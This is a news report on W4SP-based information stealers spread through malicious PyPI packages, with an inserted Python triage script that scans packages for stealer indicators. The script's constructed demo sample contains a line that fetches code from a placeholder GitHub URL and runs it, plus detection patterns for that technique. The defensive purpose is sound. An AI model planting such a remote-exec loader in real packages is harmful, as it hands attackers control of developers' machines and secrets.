The PyPI Python package repository is being hit by a wave of malicious packages that carry information-stealing malware aimed at software developers' data.
The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022.
Since then, an additional 31 packages dropping ‘W4SP’ have been removed from the PyPI repository, with the malware’s operators continuing to seek new ways to reintroduce their malware on the platform.
Targeting open-source developers
Last week, the Phylum research team reported it had found another set of 47 packages that distributed W4SP on PyPI. However, this operation was disrupted after GitHub terminated the repository used by the threat actor for fetching the primary payload.
The cybersecurity firm reported yesterday that at least 16 packages on PyPI are spreading ten different information-stealing malware variants based on W4SP Stealer.
The malicious packages that contain these information stealers are:
modulesecurity – 114 downloads
informmodule – 110 downloads
chazz – 118 downloads
randomtime – 118 downloads
proxygeneratorbil – 91 downloads
easycordey – 122 downloads
easycordeyy – 103 downloads
tomproxies – 150 downloads
sys-ej – 186 downloads
py4sync – 453 downloads
infosys – 191 downloads
sysuptoer – 186 downloads
nowsys – 202 downloads
upamonkws – 205 downloads
captchaboy – 123 downloads
proxybooster – 69 downloads
While these packages drop stealers that use different names, like Celestial Stealer, ANGEL stealer, Satan Stealer, @skid Stealer, and Leaf $tealer, Phylum has found that they are all based on the W4SP code.
“Each deployment appears to have simply tried to do a find/replace of the W4SP references in exchange for some other seemingly arbitrary name. In some cases, not all references were removed and trace strings of ‘W4SP’ remain.” – Phylum.
With one exception, “chazz,” the new stealers do not follow W4SP’s complex attack chain that features multiple stages and code obfuscation.
Instead, they drop the stealer's code directly into the package's "main.py" or "__init__.py" files without any encoding or obfuscation, so a basic code review immediately reveals their nature.
The "chazz" package, which drops a copy of the "Leaf $tealer," is the only one of the new batch that features some obfuscation via the BlankOBF tool, but it is still reasonably easy to deobfuscate.
Following the same tactics as with the W4SP operation, the new stealers use GitHub repositories as a remote resource for downloading the malware payload.
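The traits described above (un-obfuscated stealer code dropped straight into main.py or __init__.py, leftover "W4SP" trace strings and clone names, and a payload staged on GitHub) are exactly what a reviewer would grep for before installing an unfamiliar package. The script below is an added example, not code from the article or from Phylum's tooling: it statically scans an unpacked package for those indicators plus a couple of generic obfuscation heuristics (exec of decoded or remotely fetched data). The patterns are my own assumptions about what is worth flagging, not Phylum's detection rules, and the sample "malicious" package it builds is constructed for the demo, with a placeholder GitHub URL; it contains no real stealer code.

```python
"""Static triage of an unpacked PyPI package for W4SP-style stealer indicators.

Heuristic only: a hit means "read this file before installing", not a verdict.
"""
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Pattern

# Names the article reports; a bare "W4SP" also catches the trace strings that
# a sloppy find/replace rebrand leaves behind.
STEALER_NAMES = ["W4SP", "Celestial Stealer", "ANGEL stealer", "Satan Stealer",
                 "@skid Stealer", "Leaf $tealer"]

# Assumed heuristics (mine, not Phylum's rules).
PATTERNS: Dict[str, Pattern[str]] = {
    "stealer_name": re.compile("|".join(re.escape(n) for n in STEALER_NAMES), re.I),
    # Payload staged on GitHub, as the article says these packages do.
    "github_fetch": re.compile(
        r"https?://(?:raw\.githubusercontent\.com|github\.com)/[^\s'\"]+", re.I),
    # Generic obfuscation: executing decoded or decompressed data.
    "exec_decoded": re.compile(
        r"\bexec\s*\(.*\b(?:b64decode|zlib\.decompress|fromhex|decompress)\b"),
    # Remote content piped straight into exec/eval.
    "exec_remote": re.compile(
        r"\b(?:exec|eval)\s*\(.*\b(?:urlopen|requests\.get|\.content|\.text)\b"),
}

# Files the article says the un-obfuscated clones drop the stealer into, plus
# setup.py, which runs at install time.
HOTSPOT_FILES = {"setup.py", "__init__.py", "main.py"}


@dataclass(frozen=True)
class Finding:
    path: str        # relative to the package root
    indicator: str   # key from PATTERNS
    lineno: int
    snippet: str
    hotspot: bool    # True if the file is one of HOTSPOT_FILES


def scan_file(path: Path, root: Path) -> List[Finding]:
    """Return one Finding per (line, pattern) hit in a single .py file."""
    findings: List[Finding] = []
    text = path.read_text(encoding="utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pat in PATTERNS.items():
            if pat.search(line):
                findings.append(Finding(str(path.relative_to(root)), name, lineno,
                                        line.strip()[:80], path.name in HOTSPOT_FILES))
    return findings


def scan_package(root: Path) -> List[Finding]:
    """Scan every .py file under an unpacked sdist/wheel directory."""
    findings: List[Finding] = []
    for path in sorted(root.rglob("*.py")):
        findings.extend(scan_file(path, root))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Collapse findings into a triage label for a human reviewer."""
    kinds = {f.indicator for f in findings}
    if "stealer_name" in kinds or ("github_fetch" in kinds
                                   and kinds & {"exec_decoded", "exec_remote"}):
        return "review-immediately"
    return "suspicious" if findings else "no-indicators"


# Constructed sample files for the demo. The "malicious" __init__.py mimics the
# shape the article describes (loader in __init__.py, payload on GitHub, trace
# string left over from a rebrand); the URL is a placeholder, not a real repo.
MALICIOUS_INIT = '''\
import base64, requests  # constructed sample, not real stealer code
PAYLOAD = "https://raw.githubusercontent.com/example-user/example-repo/main/loader.py"
def grab():
    # leftover trace string after a find/replace rebrand
    print("W4SP init")
    exec(requests.get(PAYLOAD).text)
'''
BENIGN_INIT = '''\
"""Harmless helper."""
def add(a, b):
    return a + b
'''
SETUP_PY = 'from setuptools import setup\nsetup(name="demo", version="0.0.1")\n'


def build_sample_package(root: Path, malicious: bool) -> Path:
    """Write a tiny unpacked package (setup.py + pkg/__init__.py) and return root."""
    (root / "pkg").mkdir(parents=True, exist_ok=True)
    (root / "setup.py").write_text(SETUP_PY)
    (root / "pkg" / "__init__.py").write_text(MALICIOUS_INIT if malicious else BENIGN_INIT)
    return root


def scan_samples() -> Dict[str, List[Finding]]:
    """Build both constructed packages in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as d:
        bad = build_sample_package(Path(d) / "bad", malicious=True)
        good = build_sample_package(Path(d) / "good", malicious=False)
        return {"malicious": scan_package(bad), "benign": scan_package(good)}


if __name__ == "__main__":
    for label, findings in scan_samples().items():
        print(f"{label}: {verdict(findings)}")
        for f in findings:
            print(f"  {f.path}:{f.lineno} [{f.indicator}{' hotspot' if f.hotspot else ''}] {f.snippet}")
```

To use it on a real download, run `pip download --no-deps --no-binary :all: <name>` (or fetch the wheel), unpack it, and point `scan_package` at the directory; read any hotspot hit in full, since a single leftover trace string is enough to condemn a package, while a plain GitHub URL in a README-style docstring is not.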
It is unclear whether these malware “clones” are operated by the same threat actors behind W4SP or its copycats, but Phylum hypothesizes it’s from different groups that attempt to mimic previous campaigns.
All the packages presented in this report have been removed from the PyPI repository, but not before they were downloaded over 2,500 times.
Hackers have been increasingly targeting open-source package repositories, as compromising developers' systems opens the door to even larger attacks.
As developers commonly store authorization tokens and API keys in their applications, stealing these secrets could allow threat actors to conduct more widespread supply chain attacks or steal data for use in extortion demands.
As long as the infection numbers make an effort worthwhile, we will continue to see threat actors uploading malicious packages on open-source repositories under different names and accounts.